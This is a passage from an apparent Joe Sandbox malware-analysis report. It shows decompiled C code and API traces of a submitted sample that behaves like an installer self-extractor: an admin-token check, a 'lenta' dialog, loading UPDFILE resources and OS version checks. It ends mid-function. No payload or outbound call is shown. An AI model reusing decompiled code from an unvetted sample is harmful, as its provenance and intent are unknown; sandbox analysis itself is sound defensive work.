                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                      • String ID: TITLE$lenta
                                                                      • API String ID: 3370778649-2035842925
                                                                      • Opcode ID: 98917aa22b4b71499f14b63bf143300c181b177b06786280885ee640b7afd57c
                                                                      • Instruction ID: 751e553d8d42df381920a85b0f4bfae50914960a07438ca43496799230f5a34d
                                                                      • Opcode Fuzzy Hash: 98917aa22b4b71499f14b63bf143300c181b177b06786280885ee640b7afd57c
                                                                      • Instruction Fuzzy Hash: 7E018637246210BBE33856A97C4DF6B7E2CDFC5B52F044024FB5A97544CA71888187A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 57%
                                                                      			E011D17EE(intOrPtr* __ecx) {
                                                                      				signed int _v8;
                                                                      				short _v12;
                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                      				_Unknown_base(*)()* _v20;
                                                                      				void* _v24;
                                                                      				intOrPtr* _v28;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t14;
                                                                      				_Unknown_base(*)()* _t20;
                                                                      				long _t28;
                                                                      				void* _t35;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				signed int _t38;
                                                                      				intOrPtr* _t39;
                                                                      
                                                                      				_t14 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t14 ^ _t38;
                                                                      				_v12 = 0x500;
                                                                      				_t37 = __ecx;
                                                                      				_v16.Value = 0;
                                                                      				_v28 = __ecx;
                                                                      				_t28 = 0;
                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                      				if(_t36 != 0) {
                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                      					_v20 = _t20;
                                                                      					if(_t20 != 0) {
                                                                      						 *_t37 = 0;
                                                                      						_t28 = 1;
                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                      							_t37 = _t39;
                                                                      							 *0x11da288(0, _v24, _v28);
                                                                      							_v20();
                                                                      							if(_t39 != _t39) {
                                                                      								asm("int 0x29");
                                                                      							}
                                                                      							FreeSid(_v24);
                                                                      						}
                                                                      					}
                                                                      					FreeLibrary(_t36);
                                                                      				}
                                                                      				return E011D6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                      			}



















                                                                      0x011d17f6
                                                                      0x011d17fd
                                                                      0x011d1805
                                                                      0x011d180b
                                                                      0x011d180d
                                                                      0x011d1815
                                                                      0x011d1818
                                                                      0x011d1820
                                                                      0x011d1824
                                                                      0x011d182c
                                                                      0x011d1832
                                                                      0x011d1837
                                                                      0x011d1851
                                                                      0x011d1854
                                                                      0x011d185d
                                                                      0x011d1862
                                                                      0x011d186c
                                                                      0x011d1872
                                                                      0x011d1877
                                                                      0x011d187e
                                                                      0x011d187e
                                                                      0x011d1883
                                                                      0x011d1883
                                                                      0x011d185d
                                                                      0x011d188a
                                                                      0x011d188a
                                                                      0x011d18a2

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,011D18DD), ref: 011D181A
                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 011D182C
                                                                      • AllocateAndInitializeSid.ADVAPI32(011D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,011D18DD), ref: 011D1855
                                                                      • FreeSid.ADVAPI32(?,?,?,?,011D18DD), ref: 011D1883
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,011D18DD), ref: 011D188A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                      • API String ID: 4204503880-1888249752
                                                                      • Opcode ID: 2e4e6b9d070d0a6d554b93e711506fe89e889a02bfb3f5abda39e11be55df6df
                                                                      • Instruction ID: 9b0d066f40031372d54fc34c606e6e3070b9802a8e8f222368e5fa17a94990ec
                                                                      • Opcode Fuzzy Hash: 2e4e6b9d070d0a6d554b93e711506fe89e889a02bfb3f5abda39e11be55df6df
                                                                      • Instruction Fuzzy Hash: A6116375E02219BBEB18DFB5EC4AABEBB78EF44701F100179FA15E3240DB7499418B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                      				void* _t7;
                                                                      				void* _t11;
                                                                      				struct HWND__* _t12;
                                                                      				int _t22;
                                                                      				struct HWND__* _t24;
                                                                      
                                                                      				_t7 = _a8 - 0x10;
                                                                      				if(_t7 == 0) {
                                                                      					EndDialog(_a4, 2);
                                                                      					L11:
                                                                      					return 1;
                                                                      				}
                                                                      				_t11 = _t7 - 0x100;
                                                                      				if(_t11 == 0) {
                                                                      					_t12 = GetDesktopWindow();
                                                                      					_t24 = _a4;
                                                                      					E011D43D0(_t24, _t12);
                                                                      					SetWindowTextA(_t24, "lenta");
                                                                      					SetDlgItemTextA(_t24, 0x838,  *0x11d9404);
                                                                      					SetForegroundWindow(_t24);
                                                                      					goto L11;
                                                                      				}
                                                                      				if(_t11 == 1) {
                                                                      					_t22 = _a12;
                                                                      					if(_t22 < 6) {
                                                                      						goto L11;
                                                                      					}
                                                                      					if(_t22 <= 7) {
                                                                      						L8:
                                                                      						EndDialog(_a4, _t22);
                                                                      						return 1;
                                                                      					}
                                                                      					if(_t22 != 0x839) {
                                                                      						goto L11;
                                                                      					}
                                                                      					 *0x11d91dc = 1;
                                                                      					goto L8;
                                                                      				}
                                                                      				return 0;
                                                                      			}








                                                                      0x011d3459
                                                                      0x011d345c
                                                                      0x011d34d8
                                                                      0x011d34de
                                                                      0x00000000
                                                                      0x011d34e0
                                                                      0x011d345e
                                                                      0x011d3463
                                                                      0x011d349a
                                                                      0x011d34a0
                                                                      0x011d34a7
                                                                      0x011d34b2
                                                                      0x011d34c4
                                                                      0x011d34cb
                                                                      0x00000000
                                                                      0x011d34cb
                                                                      0x011d3468
                                                                      0x011d346e
                                                                      0x011d3474
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d347c
                                                                      0x011d348c
                                                                      0x011d3490
                                                                      0x00000000
                                                                      0x011d3496
                                                                      0x011d3484
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3486
                                                                      0x00000000
                                                                      0x011d3486
                                                                      0x00000000

                                                                      APIs
                                                                      • EndDialog.USER32(?,?), ref: 011D3490
                                                                      • GetDesktopWindow.USER32 ref: 011D349A
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 011D34B2
                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 011D34C4
                                                                      • SetForegroundWindow.USER32(?), ref: 011D34CB
                                                                      • EndDialog.USER32(?,00000002), ref: 011D34D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                      • String ID: lenta
                                                                      • API String ID: 852535152-2780258678
                                                                      • Opcode ID: 4ee04aa2bc40a31551f96e148e735e8d70a415180c68dee9b38594e82366e2ca
                                                                      • Instruction ID: a42414dc85bbf5bb229357571cffdc6331639ccbbc21366376cda7de7dbfba7c
                                                                      • Opcode Fuzzy Hash: 4ee04aa2bc40a31551f96e148e735e8d70a415180c68dee9b38594e82366e2ca
                                                                      • Instruction Fuzzy Hash: 5601D875262124ABD72E9F7DF80C96E3F64FF05750F044024FA7697984CB389A81C792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E011D2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t16;
                                                                      				int _t21;
                                                                      				char _t32;
                                                                      				intOrPtr _t34;
                                                                      				char* _t38;
                                                                      				char _t42;
                                                                      				char* _t44;
                                                                      				CHAR* _t52;
                                                                      				intOrPtr* _t55;
                                                                      				CHAR* _t59;
                                                                      				void* _t62;
                                                                      				CHAR* _t64;
                                                                      				CHAR* _t65;
                                                                      				signed int _t66;
                                                                      
                                                                      				_t60 = __edx;
                                                                      				_t16 =  *0x11d8004; // 0xdc3102d5
                                                                      				_t17 = _t16 ^ _t66;
                                                                      				_v8 = _t16 ^ _t66;
                                                                      				_t65 = _a4;
                                                                      				_t44 = __edx;
                                                                      				_t64 = __ecx;
                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                      					GetModuleFileNameA( *0x11d9a3c,  &_v268, 0x104);
                                                                      					while(1) {
                                                                      						_t17 =  *_t64;
                                                                      						if(_t17 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                      						 *_t65 =  *_t64;
                                                                      						if(_t21 != 0) {
                                                                      							_t65[1] = _t64[1];
                                                                      						}
                                                                      						if( *_t64 != 0x23) {
                                                                      							L19:
                                                                      							_t65 = CharNextA(_t65);
                                                                      						} else {
                                                                      							_t64 = CharNextA(_t64);
                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                      									if( *_t64 == 0x23) {
                                                                      										goto L19;
                                                                      									}
                                                                      								} else {
                                                                      									E011D1680(_t65, E011D17C8(_t44, _t65),  &_v268);
                                                                      									_t52 = _t65;
                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                      									_t60 = _t14;
                                                                      									do {
                                                                      										_t32 =  *_t52;
                                                                      										_t52 =  &(_t52[1]);
                                                                      									} while (_t32 != 0);
                                                                      									goto L17;
                                                                      								}
                                                                      							} else {
                                                                      								E011D65E8( &_v268);
                                                                      								_t55 =  &_v268;
                                                                      								_t62 = _t55 + 1;
                                                                      								do {
                                                                      									_t34 =  *_t55;
                                                                      									_t55 = _t55 + 1;
                                                                      								} while (_t34 != 0);
                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                      									 *_t38 = 0;
                                                                      								}
                                                                      								E011D1680(_t65, E011D17C8(_t44, _t65),  &_v268);
                                                                      								_t59 = _t65;
                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                      								_t60 = _t12;
                                                                      								do {
                                                                      									_t42 =  *_t59;
                                                                      									_t59 =  &(_t59[1]);
                                                                      								} while (_t42 != 0);
                                                                      								L17:
                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                      							}
                                                                      						}
                                                                      						_t64 = CharNextA(_t64);
                                                                      					}
                                                                      					 *_t65 = _t17;
                                                                      				}
                                                                      				return E011D6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                      			}






















                                                                      0x011d2aac
                                                                      0x011d2ab7
                                                                      0x011d2abc
                                                                      0x011d2abe
                                                                      0x011d2ac3
                                                                      0x011d2ac6
                                                                      0x011d2ac9
                                                                      0x011d2ace
                                                                      0x011d2ae6
                                                                      0x011d2bdc
                                                                      0x011d2bdc
                                                                      0x011d2be0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2af2
                                                                      0x011d2afc
                                                                      0x011d2b00
                                                                      0x011d2b05
                                                                      0x011d2b05
                                                                      0x011d2b0b
                                                                      0x011d2bca
                                                                      0x011d2bd1
                                                                      0x011d2b11
                                                                      0x011d2b18
                                                                      0x011d2b26
                                                                      0x011d2b99
                                                                      0x011d2bc8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d2b9b
                                                                      0x011d2bae
                                                                      0x011d2bb3
                                                                      0x011d2bb5
                                                                      0x011d2bb5
                                                                      0x011d2bb8
                                                                      0x011d2bb8
                                                                      0x011d2bba
                                                                      0x011d2bbb
                                                                      0x00000000
                                                                      0x011d2bb8
                                                                      0x011d2b28
                                                                      0x011d2b2e
                                                                      0x011d2b33
                                                                      0x011d2b39
                                                                      0x011d2b3c
                                                                      0x011d2b3c
                                                                      0x011d2b3e
                                                                      0x011d2b3f
                                                                      0x011d2b55
                                                                      0x011d2b5d
                                                                      0x011d2b64
                                                                      0x011d2b64
                                                                      0x011d2b7a
                                                                      0x011d2b7f
                                                                      0x011d2b81
                                                                      0x011d2b81
                                                                      0x011d2b84
                                                                      0x011d2b84
                                                                      0x011d2b86
                                                                      0x011d2b87
                                                                      0x011d2bbf
                                                                      0x011d2bc1
                                                                      0x011d2bc1
                                                                      0x011d2b26
                                                                      0x011d2bda
                                                                      0x011d2bda
                                                                      0x011d2be6
                                                                      0x011d2be6
                                                                      0x011d2bf8

                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 011D2AE6
                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 011D2AF2
                                                                      • CharNextA.USER32(?), ref: 011D2B12
                                                                      • CharUpperA.USER32 ref: 011D2B1E
                                                                      • CharPrevA.USER32(?,?), ref: 011D2B55
                                                                      • CharNextA.USER32(?), ref: 011D2BD4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                      • String ID:
                                                                      • API String ID: 571164536-0
                                                                      • Opcode ID: ec4cec36d5b5bb2194f28909199934ba2202ef84bb465b4efef72ccee3ab9ed5
                                                                      • Instruction ID: 2b93f81c7e4c01e97726373cd3130b294502d803efd9fa5b4ff2213ba6da6833
                                                                      • Opcode Fuzzy Hash: ec4cec36d5b5bb2194f28909199934ba2202ef84bb465b4efef72ccee3ab9ed5
                                                                      • Instruction Fuzzy Hash: 15415B346052465FDF2E9F38D814AFD7FB99F46200F0400EAD8E287202DBB54E86CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E011D43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                      				signed int _v8;
                                                                      				struct tagRECT _v24;
                                                                      				struct tagRECT _v40;
                                                                      				struct HWND__* _v44;
                                                                      				intOrPtr _v48;
                                                                      				int _v52;
                                                                      				intOrPtr _v56;
                                                                      				int _v60;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t29;
                                                                      				void* _t53;
                                                                      				intOrPtr _t56;
                                                                      				int _t59;
                                                                      				struct HWND__* _t63;
                                                                      				struct HWND__* _t67;
                                                                      				struct HWND__* _t68;
                                                                      				struct HDC__* _t69;
                                                                      				int _t72;
                                                                      				signed int _t74;
                                                                      
                                                                      				_t63 = __edx;
                                                                      				_t29 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t29 ^ _t74;
                                                                      				_t68 = __edx;
                                                                      				_v44 = __ecx;
                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                      				_v48 = _v40.right - _v40.left;
                                                                      				GetWindowRect(_t68,  &_v24);
                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                      				_t69 = GetDC(_v44);
                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                      				ReleaseDC(_v44, _t69);
                                                                      				_t56 = _v48;
                                                                      				asm("cdq");
                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                      				_t67 = 0;
                                                                      				if(_t72 >= 0) {
                                                                      					_t63 = _v52;
                                                                      					if(_t72 + _t56 > _t63) {
                                                                      						_t72 = _t63 - _t56;
                                                                      					}
                                                                      				} else {
                                                                      					_t72 = _t67;
                                                                      				}
                                                                      				asm("cdq");
                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                      				if(_t59 >= 0) {
                                                                      					_t63 = _v60;
                                                                      					if(_t59 + _t53 > _t63) {
                                                                      						_t59 = _t63 - _t53;
                                                                      					}
                                                                      				} else {
                                                                      					_t59 = _t67;
                                                                      				}
                                                                      				return E011D6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                      			}
























                                                                      0x011d43d0
                                                                      0x011d43d8
                                                                      0x011d43df
                                                                      0x011d43e6
                                                                      0x011d43ec
                                                                      0x011d43f1
                                                                      0x011d4400
                                                                      0x011d4403
                                                                      0x011d440b
                                                                      0x011d4420
                                                                      0x011d4429
                                                                      0x011d4437
                                                                      0x011d4444
                                                                      0x011d4447
                                                                      0x011d444d
                                                                      0x011d4454
                                                                      0x011d445b
                                                                      0x011d4460
                                                                      0x011d4461
                                                                      0x011d4467
                                                                      0x011d446f
                                                                      0x011d4473
                                                                      0x011d4473
                                                                      0x011d4463
                                                                      0x011d4463
                                                                      0x011d4463
                                                                      0x011d447a
                                                                      0x011d4481
                                                                      0x011d4484
                                                                      0x011d448a
                                                                      0x011d4492
                                                                      0x011d4496
                                                                      0x011d4496
                                                                      0x011d4486
                                                                      0x011d4486
                                                                      0x011d4486
                                                                      0x011d44b8

                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 011D43F1
                                                                      • GetWindowRect.USER32(00000000,?), ref: 011D440B
                                                                      • GetDC.USER32(?), ref: 011D4423
                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 011D442E
                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 011D443A
                                                                      • ReleaseDC.USER32(?,00000000), ref: 011D4447
                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 011D44A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                      • String ID:
                                                                      • API String ID: 2212493051-0
                                                                      • Opcode ID: 89190ec68c04578feb35486d64e38ce4a389a0fb66563f9f69c7c115493e0c65
                                                                      • Instruction ID: db284915c3c8a46815dac4b71e32f8e9e9850c742f844c2485c2c1301d172943
                                                                      • Opcode Fuzzy Hash: 89190ec68c04578feb35486d64e38ce4a389a0fb66563f9f69c7c115493e0c65
                                                                      • Instruction Fuzzy Hash: B7312D32E01119AFCB18CFB8D9889EEBBB5EF89210F154169E815B3644DB306D45CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E011D6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v28;
                                                                      				intOrPtr _v32;
                                                                      				struct HINSTANCE__* _v36;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t16;
                                                                      				struct HRSRC__* _t21;
                                                                      				intOrPtr _t26;
                                                                      				void* _t30;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				intOrPtr* _t40;
                                                                      				void* _t41;
                                                                      				intOrPtr* _t44;
                                                                      				intOrPtr* _t45;
                                                                      				void* _t47;
                                                                      				signed int _t50;
                                                                      				struct HINSTANCE__* _t51;
                                                                      
                                                                      				_t44 = __edx;
                                                                      				_t16 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t16 ^ _t50;
                                                                      				_t46 = 0;
                                                                      				_v32 = __ecx;
                                                                      				_v36 = 0;
                                                                      				_t36 = 1;
                                                                      				E011D171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                      				while(1) {
                                                                      					_t51 = _t51 + 0x10;
                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                      					if(_t21 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                      					if(_t45 == 0) {
                                                                      						 *0x11d9124 = 0x80070714;
                                                                      						_t36 = _t46;
                                                                      					} else {
                                                                      						_t5 = _t45 + 8; // 0x8
                                                                      						_t44 = _t5;
                                                                      						_t40 = _t44;
                                                                      						_t6 = _t40 + 1; // 0x9
                                                                      						_t47 = _t6;
                                                                      						do {
                                                                      							_t26 =  *_t40;
                                                                      							_t40 = _t40 + 1;
                                                                      						} while (_t26 != 0);
                                                                      						_t41 = _t40 - _t47;
                                                                      						_t46 = _t51;
                                                                      						_t7 = _t41 + 1; // 0xa
                                                                      						 *0x11da288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                      						_t30 = _v32();
                                                                      						if(_t51 != _t51) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      						_push(_t45);
                                                                      						if(_t30 == 0) {
                                                                      							_t36 = 0;
                                                                      							FreeResource(??);
                                                                      						} else {
                                                                      							FreeResource();
                                                                      							_v36 = _v36 + 1;
                                                                      							E011D171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                      							_t46 = 0;
                                                                      							continue;
                                                                      						}
                                                                      					}
                                                                      					L12:
                                                                      					return E011D6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                      				}
                                                                      				goto L12;
                                                                      			}






















                                                                      0x011d6298
                                                                      0x011d62a0
                                                                      0x011d62a7
                                                                      0x011d62ad
                                                                      0x011d62af
                                                                      0x011d62bb
                                                                      0x011d62c3
                                                                      0x011d62c4
                                                                      0x011d633b
                                                                      0x011d633b
                                                                      0x011d6345
                                                                      0x011d634d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d62da
                                                                      0x011d62de
                                                                      0x011d635f
                                                                      0x011d6369
                                                                      0x011d62e0
                                                                      0x011d62e0
                                                                      0x011d62e0
                                                                      0x011d62e3
                                                                      0x011d62e5
                                                                      0x011d62e5
                                                                      0x011d62e8
                                                                      0x011d62e8
                                                                      0x011d62ea
                                                                      0x011d62eb
                                                                      0x011d62ef
                                                                      0x011d62f1
                                                                      0x011d62f3
                                                                      0x011d6302
                                                                      0x011d6308
                                                                      0x011d630d
                                                                      0x011d6314
                                                                      0x011d6314
                                                                      0x011d6316
                                                                      0x011d6319
                                                                      0x011d6355
                                                                      0x011d6357
                                                                      0x011d631b
                                                                      0x011d631b
                                                                      0x011d6331
                                                                      0x011d6334
                                                                      0x011d6339
                                                                      0x00000000
                                                                      0x011d6339
                                                                      0x011d6319
                                                                      0x011d636b
                                                                      0x011d637d
                                                                      0x011d637d
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 011D171E: _vsnprintf.MSVCRT ref: 011D1750
                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,011D51CA,00000004,00000024,011D2F71,?,00000002,00000000), ref: 011D62CD
                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,011D51CA,00000004,00000024,011D2F71,?,00000002,00000000), ref: 011D62D4
                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,011D51CA,00000004,00000024,011D2F71,?,00000002,00000000), ref: 011D631B
                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 011D6345
                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,011D51CA,00000004,00000024,011D2F71,?,00000002,00000000), ref: 011D6357
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                      • String ID: UPDFILE%lu
                                                                      • API String ID: 2922116661-2329316264
                                                                      • Opcode ID: 1b2e177dfc46648ab25debad0b3072895ad7cbb3684bcdbbace55693aed4353d
                                                                      • Instruction ID: 47fcbf38f94c09d1f43a6f20ee429efa93d841d9e9950ddbc5989d89c6836a09
                                                                      • Opcode Fuzzy Hash: 1b2e177dfc46648ab25debad0b3072895ad7cbb3684bcdbbace55693aed4353d
                                                                      • Instruction Fuzzy Hash: 3721E775A05219BBDB2C9FA5DC459FF7B7CFF44714B010229EA16A3201DB359942CBE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E011D681F(void* __ebx) {
                                                                      				signed int _v8;
                                                                      				char _v20;
                                                                      				struct _OSVERSIONINFOA _v168;
                                                                      				void* _v172;
                                                                      				int* _v176;
                                                                      				int _v180;
                                                                      				int _v184;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t19;
                                                                      				long _t31;
                                                                      				signed int _t35;
                                                                      				void* _t36;
                                                                      				intOrPtr _t41;
                                                                      				signed int _t44;
                                                                      
                                                                      				_t36 = __ebx;
                                                                      				_t19 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t19 ^ _t44;
                                                                      				_t41 =  *0x11d81d8; // 0xfffffffe
                                                                      				_t43 = 0;
                                                                      				_v180 = 0xc;
                                                                      				_v176 = 0;
                                                                      				if(_t41 == 0xfffffffe) {
                                                                      					 *0x11d81d8 = 0;
                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                      						L12:
                                                                      						_t41 =  *0x11d81d8; // 0xfffffffe
                                                                      					} else {
                                                                      						_t41 = 1;
                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                      							goto L12;
                                                                      						} else {
                                                                      							_t31 = RegQueryValueExA(_v172, 0x11d1140, 0,  &_v184,  &_v20,  &_v180);
                                                                      							_t43 = _t31;
                                                                      							RegCloseKey(_v172);
                                                                      							if(_t31 != 0) {
